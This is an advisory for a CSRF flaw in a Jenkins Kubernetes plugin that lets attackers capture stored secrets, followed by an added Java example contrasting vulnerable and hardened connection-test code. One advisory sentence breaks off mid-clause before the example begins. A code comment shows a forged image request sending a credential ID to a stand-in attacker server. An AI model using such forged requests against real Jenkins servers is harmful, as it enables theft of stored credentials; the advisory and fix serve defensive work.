Cross-Site Request Forgery (CSRF) Affecting io.alauda.jenkins.plugins:alauda-kubernetes-support package, versions [0,]
20 Dec 2019
17 Dec 2019
Viktor Gazdag NCC Group
How to fix?
There is no fixed version for io.alauda.jenkins.plugins:alauda-kubernetes-support.
io.alauda.jenkins.plugins:alauda-kubernetes-support is a plugin for Jenkins.
Affected versions of this package are vulnerable to Cross-Site Request Forgery (CSRF). The plugin does not require POST requests for a connection test method, so the method can be triggered by a forged GET request from a page the victim visits while logged in to Jenkins. This allows attackers to make Jenkins connect to Kubernetes-related paths on an attacker-specified web server, authenticating with a credentials ID the attacker obtained through another method, and thereby capture 'Secret Text' credentials stored in Jenkins.
Additionally, if no credentials ID is specified, the connection uses the default Kubernetes token from
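The pattern behind this class of Jenkins plugin bug, shown as an added example that is not the plugin's own code: the advisory does not name the affected method, so the class, method and parameter names below are assumptions, as is the placeholder probe() that stands in for the real outbound connection. The first method is the vulnerable shape (any HTTP method, no permission check, silent fallback when no credentials ID is given); the second is the hardened shape Jenkins guidance recommends, using only Stapler and credentials-plugin APIs that exist.

```java
package example; // hypothetical package; example code, not the plugin's

import java.util.Collections;

import com.cloudbees.plugins.credentials.CredentialsMatchers;
import com.cloudbees.plugins.credentials.CredentialsProvider;
import hudson.Util;
import hudson.model.Item;
import hudson.security.ACL;
import hudson.util.FormValidation;
import jenkins.model.Jenkins;
import org.jenkinsci.plugins.plaincredentials.StringCredentials;
import org.kohsuke.stapler.AncestorInPath;
import org.kohsuke.stapler.QueryParameter;
import org.kohsuke.stapler.interceptor.RequirePOST;

public class ConnectionTestExample {

    // Placeholder for the real outbound connection. A genuine implementation
    // sends the token (for example as a bearer header) to serverUrl, which is
    // exactly why an attacker-chosen serverUrl leaks the secret.
    static FormValidation probe(String serverUrl, String token) {
        return FormValidation.ok("connected to " + serverUrl);
    }

    // Resolve a 'Secret Text' credential by ID in the given context.
    static String lookupSecretText(Item context, String credentialsId) {
        StringCredentials c = CredentialsMatchers.firstOrNull(
                CredentialsProvider.lookupCredentials(
                        StringCredentials.class, context, ACL.SYSTEM,
                        Collections.emptyList()),
                CredentialsMatchers.withId(credentialsId));
        return c == null ? null : c.getSecret().getPlainText();
    }

    // BEFORE (vulnerable shape): Stapler binds any doXxx method to a URL and
    // accepts GET, so an <img src="https://jenkins/.../testConnection?
    // serverUrl=https://evil&credentialsId=..."> on an attacker page fires
    // this with the victim's session. There is no permission check, and an
    // empty credentialsId silently falls back to a default token.
    public FormValidation doTestConnectionVulnerable(
            @AncestorInPath Item context,
            @QueryParameter String serverUrl,
            @QueryParameter String credentialsId) {
        String token = Util.fixEmpty(credentialsId) == null
                ? "DEFAULT-TOKEN-PLACEHOLDER" // stands in for the default token
                : lookupSecretText(context, credentialsId);
        return probe(serverUrl, token);
    }

    // AFTER (hardened shape):
    //  - @RequirePOST rejects GET, so a cross-site image/link cannot reach it
    //    and Jenkins's CSRF crumb applies to the POST.
    //  - An explicit permission check means only users allowed to configure
    //    the item (or administer Jenkins for global config) can probe.
    //  - No default-token fallback: a blank credentials ID is an error.
    @RequirePOST
    public FormValidation doTestConnection(
            @AncestorInPath Item context,
            @QueryParameter String serverUrl,
            @QueryParameter String credentialsId) {
        if (context == null) {
            Jenkins.get().checkPermission(Jenkins.ADMINISTER);
        } else {
            context.checkPermission(Item.CONFIGURE);
        }
        if (Util.fixEmpty(serverUrl) == null) {
            return FormValidation.error("Server URL is required");
        }
        if (Util.fixEmpty(credentialsId) == null) {
            return FormValidation.error("Credentials ID is required");
        }
        String token = lookupSecretText(context, credentialsId);
        if (token == null) {
            return FormValidation.error("No Secret Text credential with that ID");
        }
        return probe(serverUrl, token);
    }
}
```

The permission check is as important as @RequirePOST: without it, any authenticated user with Overall/Read could still POST (with a valid crumb) and exfiltrate a credential they are not allowed to use. Newer versions of the credentials plugin also let the lookup be scoped to the configured server URL via URIRequirementBuilder, which further limits which secrets the method can reach.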